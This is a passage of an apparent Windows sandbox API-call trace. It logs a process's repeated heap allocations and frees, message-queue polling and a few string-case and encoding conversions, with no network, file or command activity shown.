Size=0x4) returned 0x2a71b68 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0087.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0087.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0087.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71898 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0087.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0087.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.998] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0087.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69700 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0087.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0087.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.999] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0087.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.000] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.000] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.000] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0088.000] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698e0 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: 